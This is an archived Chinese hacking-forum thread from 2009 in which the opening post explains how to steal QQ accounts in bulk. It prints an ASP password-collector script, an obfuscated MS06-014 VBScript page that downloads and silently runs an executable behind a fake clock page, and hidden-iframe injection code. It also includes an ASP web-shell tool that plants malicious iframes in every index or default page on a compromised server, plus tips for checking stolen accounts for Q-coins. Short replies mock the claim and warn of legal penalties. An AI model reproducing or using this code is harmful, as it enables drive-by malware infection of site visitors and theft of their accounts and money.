【3.A.S.T】网络安全爱好者's Archiver

黑客学习

kaka 发表于 2009-4-22 17:06

一夜盗2000个QQ!不是梦!

[color=Red]我的工具:
    1,免杀的ms0614网马.(自己多看点文章,也要做免杀)
    2,盗Q黑侠最新版(华夏有下的)
    3,空间(我用的webshell)
    4,CQQtools.(查看QQ资料的)
  先配置好盗Q黑侠的服务端,配置盗Q黑侠的时候,选择选用asp收信.
asp收信程序代码:


<%
num=request("num")
pass=request("pass")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("XXX.txt"),8,True)
file.writeline num+"---"+"-"+pass
file.close
set file=nothing
set fs=nothing
response.write "Send OK!"
%>


其中的XXX.txt一定要修改名字,防止别人探测到默认的名字.否则你的成果就被别人拿走了哦.
然后把盗Q黑侠的服务端传到你的空间里面去.配置好ms0614网马.
MS0614网马最新免杀代码(忍痛放出):

<script language="VBScript">
on error resume next
xx="object"
xxx="classid"
xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xxxxx="Microsoft.XMLHTTP"
xxxxxx="GET"
xxxxxxx="Scripting.FileSystemObject"
xxxxxxxx="Shell.Application"
dl = "http://www.baidu.com/heng.exe"
Set df = document.createElement(xx)
df.setAttribute xxx, xxxx
str=xxxxx
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6=xxxxxx
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject(xxxxxxx,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(xxxxxxxx,"")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>现在时刻!</title>
</head><body>
<center>网站为您报时!</center>
</body>
<script type="text/jscript">
function init() {
document.write(Date());
}
window.onload = init;
</script>
</html>



这个代码,我加入了IE的一个小漏洞,别人打开这个htm的时候,点查看源文件,是看不到代码的.不过,你用IE标准按钮里面的用记事本打开,还是

可以看到的.
把里面的[url]http://www.baidu.com/heng.exe[/url]修改成你木马的地址.
然后开始挂马,大家干hack这么多年,,相信手上都多少都应该都点webshell把,,把他们挂到上去.
挂马的代码:<iframe src=http://www.xxx.com/1.htm width=0 height=0 frameborder=0></iframe>
这里推荐2款工具.
第一款:

<%Server.ScriptTimeout=10000
Response.Buffer=False
%>
<html>
<head>
<title></title>
<**** http-equiv="Content-Type" c>
</head>
<body>
<%
ASP_SELF=Request.ServerVariables("PATH_INFO")
s=Request("fd")
ex=Request("ex")
pth=Request("pth")
newcnt=Request("newcnt")
If ex<>"" AND pth<>"" Then
select Case ex
Case "edit"
CALL file_show(pth)
Case "save"
CALL file_save(pth)
End select
Else
%>
<form action="<%=ASP_SELF%>" method="POST">
FOLDER (ABSOLUTE PATH):
<input type="text" name="fd" size="40">
<input type="submit" value="SUBMIT">
</form>
<%End If%>
<%
Function IsPattern(patt,str)
Set regEx=New RegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
retVal=regEx.Test(str)
Set regEx=Nothing
If retVal=True Then
IsPattern=True
Else
IsPattern=False
End If
End Function
If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then
sch s
Else
If s<>"" Then Response.Write "Invalid Agrument!"
End If
Sub sch(s)
oN eRrOr rEsUmE nExT
Set fs=Server.createObject("Scripting.FileSystemObject")
Set fd=fs.GetFolder(s)
Set fi=fd.Files
Set sf=fd.SubFolders
For Each f in fi
rtn=f.Path
step_all rtn
Next
If sf.Count<>0 Then
For Each l In sf
sch l
Next
End If
End Sub
Sub step_all(agr)
retVal=IsPattern("(\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b",agr)
If retVal Then
step1 agr
step2 agr
Else
Exit Sub
End If
End Sub
%>
<%Sub step1(str1)%>
<a href="<%=ASP_SELF%>?ex=edit&pth=<%=str1%>" target="_blank"><%=str1%></a><br>
<%End Sub%>
<%
Sub step2(str2)
addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0
frameborder=0></iframe>"
Set fs=Server.createObject("Scripting.FileSystemObject")
isExist=fs.FileExists(str2)
If isExist Then
Set f=fs.GetFile(str2)
Set f_addcode=f.OpenAsTextStream(8,-2)
f_addcode.Write addcode
f_addcode.Close
Set f=Nothing
End If
Set fs=Nothing
End Sub
%>
<%
Sub file_show(fname)
Set fs1=Server.createObject("Scripting.FileSystemObject")
isExist=fs1.FileExists(fname)
If isExist Then
Set fcnt=fs1.OpenTextFile(fname)
cnt=fcnt.ReadAll
fcnt.Close
Set fs1=Nothing%>
FILE: <%=fname%>
<form action="<%=ASP_SELF%>" method="POST">
<textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea>
<input type="hidden" name="pth" value="<%=fname%>">
<input type="hidden" name="ex" value="save">
<input type="submit" value="SAVE">
</form>
<%Else%>
<p>THE FILE IS NOT EXIT OR HAVE deleteD.</p>
<%
End If
End Sub
%>
<%
Sub file_save(fname)
Set fs2=Server.createObject("Scripting.FileSystemObject")
Set newf=fs2.createTextFile(fname,True)
newf.Write newcnt
newf.Close
Set fs2=Nothing
Response.Write "<p>THE FILE WAS MODIFIED SUCCESSFULLY.</p>"
End Sub
%>
</body>
</html>



这是一个webshell下自动挂马程序,当然其中也有我们需要修改的地方。
第一个地方:(default|index)\.(htm|html|asp|php|jsp) 意思是:选择名称为default.html,default.html,index.html,index.asp……的

文件,在里面插入代码。我们还要多添加几个。比如conn,config,后缀也要加,比如aspx.
第二个地方在addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0

frameborder=0></iframe>"。。
这里有说明,我就不解释了。

另外一款工具是明小子写的。叫做 网站批量挂马扫马程序3.0。
这是个exe工具。适合在3389肉鸡上操作。。如果肉鸡上有几百个网站,就全部*他了。前面的asp挂马程序会忙不过来的。这个工具,大家在网上面去搜.很多地方都提供下载..

接下来,就该等待QQ了。。如果网站访问量高,很快就可以收到QQ的。。

QQ拿到以后,这么多QQ,不可能手工登陆。。接下来就该CQQtools出场了。是1.1版的。网上大多流传的都是1.0版的。据说SP4版的出来了。
还可以查询3钻。。但是要钱,我在网上搜了半天。都没有找到。不过找到了1.1版的。已经足够能满足我们的要求了。

xxx.txt文件里面的QQ都是以 号码----密码 的格式保存的。我们直接复制下来,不需要修改。存到电脑上,还是用文本。
我把CCtools的界面贴出来,。

载入放有QQ号码和密码的文本。点开始。。。然后它就开始登陆网站。因为QQ网站有验证码,所以我们要手工输入验证码。
点确定后,这个QQ的详细资料就出来了。包括 QQ币。等级。保护。会员,绑定。等资料。
这里教大家个小秘诀。。我自己发现的。
登陆10个以上的QQ,接下来的QQ的QB信息会出现未知的显示。看来TX做了限制。
不过我有个办法(我们盗QQ不就是为了QB么),我们就切断ADSL。。重新拨号,更换新的IP。输入验证码查询。
看看,是不是又显示QB信息了? 这个方法只适用于动态IP的用户。
OK了。就写到这。[/color]

Ksnort 发表于 2009-4-22 19:26

回复 1楼 kaka 的帖子

不知道楼主知不知道明小子现在已经进去了,
还有盗一个QQ罚款一万
ms0614哪一年的漏洞了,谁还不补?

ShawnHBK 发表于 2009-4-22 22:36

一夜盗号几千个?我确实确定那是梦

zhangjun0018 发表于 2009-9-25 15:44

厉害
风格风格

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.